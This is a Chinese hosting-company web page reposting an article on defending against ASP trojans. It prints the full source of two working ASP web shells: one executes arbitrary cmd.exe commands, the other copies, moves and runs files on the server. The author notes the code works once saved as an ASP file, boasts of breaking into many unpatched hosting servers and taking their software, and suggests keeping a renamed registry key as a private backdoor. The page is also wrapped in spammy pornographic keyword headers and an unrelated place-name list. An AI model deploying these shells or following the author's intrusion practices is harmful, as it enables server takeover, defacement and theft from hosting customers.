亚洲日韩AV永久不卡|久久亚洲精品频在久久|国产亚洲综合网曝门系列|国产高清视频a在线大全|欧美国产日韩A在线视频Y|人妻少妇精品无码一区二区|久久久久久人妻一区精品69|熟妇人妻精品一区二区三区视频

<span id="yw77u"></span>
<p id="yw77u"></p>

    1. <td id="yw77u"><tr id="yw77u"></tr></td>

            <small id="yw77u"><dl id="yw77u"></dl></small>
              <p id="yw77u"></p>
              1.  
                售房快車 售房客車 房屋租賃 牽線搭橋 供求信息 南陽人才網(wǎng) 文藝沙龍
                 
                域名注冊 虛擬主機 云服務(wù)器 企業(yè)云郵箱 網(wǎng)站制作 網(wǎng)站推廣 無紙辦公 成功案例
                   
                服務(wù)熱線:0377-63392646 13782137062
                虛擬主機  
                · 網(wǎng) 絡(luò) 學 院
                ·友情鏈接 更多>>>
                標題:防范ASP木馬

                 
                隨著ASP 技術(shù)的發(fā)展,網(wǎng)絡(luò)上基于ASP技術(shù)開發(fā)的網(wǎng)站越來越多,對ASP技術(shù)的支持可以說已經(jīng)是windows系統(tǒng)IIS服務(wù)器的一項基本功能。但是基于ASP技術(shù)的木馬后門,也越來越多,而且功能也越來越強大。由于ASP它本身是服務(wù)器提供的一貢服務(wù)功能,所以這種ASP腳本的木馬后門,不會被殺毒軟件查殺。被黑客們稱為"永遠不會被查殺的后門"。由于其高度的隱蔽性和難查殺性,對網(wǎng)站的安全造成了嚴重的威脅。因此針對ASP木馬的防范和清除,為我們的網(wǎng)管人員提出了更高的技術(shù)要求。下面我結(jié)合個人的經(jīng)驗,談一下對兩款比較典型的ASP 木馬的防范方法,希望對大家能夠有所幫助。

                  以下是第一款木馬的代碼:
                  <title>ASP Shell</title>
                  <%@ Language=VBScript %>
                  <%
                  Dim oScript
                  Dim oScriptNet
                  Dim oFileSys, oFile
                  Dim szCMD, szTempFile
                  On Error Resume Next
                  -- create the COM objects that we will be using --
                  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
                  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
                  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
                  -- check for a command that we have posted --
                  szCMD = Request.Form(".CMD")
                  If (szCMD <> "") Then
                  -- Use a poor mans pipe ... a temp file --
                  szTempFile = "C:\" & oFileSys.GetTempName( )
                  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
                  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
                  End If
                  %>
                  <HTML>
                  <BODY>
                  <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
                  <input type=text name=".CMD" size=45 value="<%= szCMD %>">
                  <input type=submit value="執(zhí)行命令">
                  </FORM>
                  <PRE><%
                  If (IsObject(oFile)) Then
                  -- Read the output from our command and remove the temp file --
                  On Error Resume Next
                  Response.Write Server.HTMLEncode(oFile.ReadAll)
                  oFile.Close
                  Call oFileSys.DeleteFile(szTempFile, True)
                  End If
                  %>
                  </BODY>
                  </HTML>
                  運行后如下圖: 在命令行里輸入DIR命令點執(zhí)行就可以查看目錄了!!它可以使用各種DOS命令,如:copy、net、netstat等。
                  但是它的默認執(zhí)行權(quán)限只有GUEST,也就是IUSR_COMPUTER用戶的執(zhí)行權(quán)限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那么你就有管理員權(quán)限了。這一款木馬的特點是,使用很方便。幾乎就想當于DOS命令行窗口xx作一樣。但是如果服務(wù)器限制了FSO(無組件上傳),那么它是沒有辦法使用了。還有就是在服務(wù)器以后增加的虛擬主機里也沒有辦法使用。只能在"默認 Web 站點"里使用,所以它相對的適用范圍較窄。
                  對于防范方法讓我們看一下它的代碼就知道了:
                  Set oScript = Server.CreateObject("WSCRIPT.SHELL") "建立了一個名為oScript的WSCRIPT.SHELL對象,用于命令的執(zhí)行"
                  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
                  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
                  上面三行代碼創(chuàng)建了WSCRIPT.SHELL、WSCRIPT.NETWORK、Scripting.FileSystemObject三個對象,我們只要在注冊表中把控制WSCRIPT.SHELL對象的項改名或刪除就可以了。如下圖:值得注意的是:我們應該把"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"這兩項都要改名或刪除。因為如我們只修改"WSCRIPT.SHELL"項的話。那么黑客們只要把代碼修改如下:Set oScript = Server.CreateObject("WSCRIPT.SHELL.1") 這個后門木馬就又可以執(zhí)行了。
                  大家可能已經(jīng)想到了,我們在對"WSCRIPT.SHELL"項和"WSCRIPT.SHELL.1"改名時,一定要不容易被黑客們猜到,因為例如:你把"WSCRIPT.SHELL"改成了"WSCRIPT.SHELL888"。黑客們只要把代碼相應的改成:Set oScript = Server.CreateObject("WSCRIPT.SHELL888"),木馬程序就又可以執(zhí)行了。還有就修改了注冊表以后要重起WEB服務(wù),設(shè)置才會有效。
                  接下來讓我們再來看下一款ASP后門木馬程序的代碼:
                  <%response.write "<font size=6 color=red>一次只能執(zhí)行一個xx作</font>" %>
                  <%response.write now()%><BR>程序所在的物理路徑:
                  <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
                  <html>
                  <title>asps shell.application backdoor </title>
                  <body>
                  <form action="<%= Request.ServerVariables("URL") %>" method="POST">
                  <input type=text name=text value="<%=szCMD %>"> 輸入要瀏覽的目錄<br>
                  <input type=text name=text1 value="<%=szCMD1 %>">
                  copy
                  <input type=text name=text2 value="<%=szCMD2 %>"><br>
                  <input type=text name=text3 value="<%=szCMD3 %>">
                  move
                  <input type=text name=text4 value="<%=szCMD4 %>"><br>
                  路徑:<input type=text name=text5 value="<%=szCMD5 %>">
                  程序:<input type=text name=text6 value="<%=szCMD6 %>"><br>
                  <input type=submit name=sb value=發(fā)送命令>
                  </form>
                  </body>
                  </html>
                  <%
                  szCMD = Request.Form("text") 目錄瀏覽
                  if (szCMD <> "") then
                  set shell=server.createobject("shell.application") 建立shell對象
                  set fod1=shell.namespace(szcmd)
                  set foditems=fod1.items
                  for each co in foditems
                  response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"
                  next
                  end if
                  %> <%
                  szCMD1 = Request.Form("text1") 目錄拷貝,不能進行文件拷貝
                  szCMD2 = Request.Form("text2")
                  if szcmd1<>"" and szcmd2<>"" then
                  set shell1=server.createobject("shell.application") 建立shell對象
                  set fod1=shell1.namespace(szcmd2)
                  for i=len(szcmd1) to 1 step -1
                  if mid(szcmd1,i,1)="\" then
                  path=left(szcmd1,i-1)
                  exit for
                  end if
                  next
                  if len(path)=2 then path=path & "\"
                  path2=right(szcmd1,len(szcmd1)-i)
                  set fod2=shell1.namespace(path)
                  set foditem=fod2.parsename(path2)
                  fod1.copyhere foditem
                  response.write "command completed success!"
                  end if
                  %> <%
                  szCMD3 = Request.Form("text3") 目錄移動
                  szCMD4 = Request.Form("text4")
                  if szcmd3<>"" and szcmd4<>"" then
                  set shell2=server.createobject("shell.application") 建立shell對象
                  set fod1=shell2.namespace(szcmd4) for i=len(szcmd3) to 1 step -1
                  if mid(szcmd3,i,1)="\" then
                  path=left(szcmd3,i-1)
                  exit for
                  end if
                  next if len(path)=2 then path=path & "\"
                  path2=right(szcmd3,len(szcmd3)-i)
                  set fod2=shell2.namespace(path)
                  set foditem=fod2.parsename(path2)
                  fod1.movehere foditem
                  response.write "command completed success!"
                  end if
                  %>
                  <%
                  szCMD5 = Request.Form("text5") 執(zhí)行程序要指定路徑
                  szCMD6 = Request.Form("text6")
                  if szcmd5<>"" and szcmd6<>"" then
                  set shell3=server.createobject("shell.application") 建立shell對象
                  shell3.namespace(szcmd5).items.item(szcmd6).invokeverb
                  response.write "command completed success!"
                  end if
                  %>
                  執(zhí)行后如下圖:要查看目錄,只要輸入相應的目錄,點發(fā)送命令就可以了。如下圖:
                  這個木馬程可以完成文件的COPY、MOVE,和執(zhí)行程序。但很多命令都不能用,例如:del、net、netstat等。這個木馬程的功能隨然簡單,但是用它來黑一個網(wǎng)站是足夠了。比如,我們可以把網(wǎng)站的首頁MOVE到其它地方,然后我們再COPY一個同名的黑客網(wǎng)頁進去,就行了。
                  最要命的是這個木馬適用于任何虛擬主機之中,也就是說我只要是服務(wù)器中的一個虛擬空間的用戶,我就可以傳這個木馬上去,并用它來修改其它任何用戶的主頁。所以如果哪些提供虛擬空間的服務(wù)商沒有打補丁的話,那真是死定了。
                  然而在我的實踐中發(fā)現(xiàn),中國很多的虛擬空間服務(wù)商,特別是一些小型的服務(wù)商都沒有打補丁。我利用這一漏洞拿到了很多虛擬空間服務(wù)器的ADMIN,然后好心的幫他們補上漏洞。當然我也得到了我想得到的東西——很多好的軟件和代碼。我現(xiàn)在用著的很多ASP程序就是從他們那上面偷下來,太難聽了,應該說DOWN下來的才對。
                  言歸正傳,我們應該怎樣來防范這個ASP后門木馬程序呢?讓我們看一下它其中的這一句代碼:set shell=server.createobject("shell.application"),跟剛才的方法一樣,如下圖:
                  我們只要把"shell.application"項和"shell.application.1"項改名或刪除就可以了。記住了,如果是改名,要改得復雜一點,不要讓黑客們一下就猜到了。順便說一句,如果是你給肉雞打補丁最好是改名,并把名字記下來,這樣也就成為自己一個隱密的后門了。最后對這兩款ASP木馬后門,以及如何防范ASP木馬后門做一下總結(jié):第一款木馬功能上強大一些, 但適用范圍窄,需要FSO支持也就是"Scripting.FileSystemObject"項的支持。第二款木馬雖然功能上少一些,但它創(chuàng)建的是"shell.application"對象。在任何虛擬主機中都適用。(這一點危害確實太大了,提供支持ASP空間的管理員們,你們可得注意了。
                  其實跟據(jù)對上面兩款ASP木馬后門的防范,大家可能已經(jīng)想到了,對于ASP后門木馬的防范,我們只要在注冊表中把"shell.application"、"WSCRIPT.SHELL"等危險的腳本對象(因為它們都是用于創(chuàng)建腳本命令通道的)進行改名或刪除,也就是限制系統(tǒng)對"腳本SHELL"的創(chuàng)建,ASP木馬也就成為無本之木、無米之炊,運行不起來了。
                  注:以上代碼復制保存為ASP文件就可以直接使用了。(僅用于測試,不要搞破壞,后果自負。海

                  作者:佚名 來源:網(wǎng)絡(luò)

                 

                點擊[5194]次  發(fā)布日期: 2007-3-26 21:41:53    發(fā)布人:中國開網(wǎng)
                :上一篇
                  下一篇:

                返回首頁 |公司簡介 |開網(wǎng)招聘 |支付說明 |行業(yè)新聞 | 聯(lián)系方式 |客服中心| 相關(guān)咨詢|廣告服務(wù) |郵箱登錄

                豫公網(wǎng)安備 41130302000019號


                豫ICP備2024042951號

                南陽市開網(wǎng)網(wǎng)絡(luò)技術(shù)有限公司◎0377-63392646

                業(yè)務(wù)專線: 0377-63392646 1378217062

                總部地址: 河南省南陽市車站路146號新城百樂大廈13樓12室

                業(yè)務(wù)①Q(mào)Q:401853676 客服①Q(mào)Q:776288762 

                Email:xuejinfu@kyxxw.com  

                Copyright © 2025 南陽市開網(wǎng)網(wǎng)絡(luò)技術(shù)有限公司 ◇版權(quán)所有

                中國開網(wǎng)旗下網(wǎng)站:
                信息版:www.additionaltrade.com 
                網(wǎng)絡(luò)版:www.cnkw.cn
                成賣網(wǎng):www.cmai.cn
                開網(wǎng)PC手機微信APP小程序五合一網(wǎng)站
                www.0377it.cn
                www.cnkw.cn
                腾冲县| 镇雄县| 全南县| 扎赉特旗| 开化县| 朝阳市| 平远县| 涟源市| 玉门市| 巴林右旗| 鄂尔多斯市| 星子县| 唐河县| 伊宁市| 罗平县| 婺源县| 普兰县| 山阳县| 揭西县| 克什克腾旗| 稷山县| 佛教| 梓潼县| 洞头县| 通河县| 定兴县| 满城县| 巴中市| 京山县| 客服| 柯坪县| 和顺县| 健康| 清水县| 宜昌市| 南平市| 萨嘎县| 永宁县| 南靖县| 连云港市| 大洼县|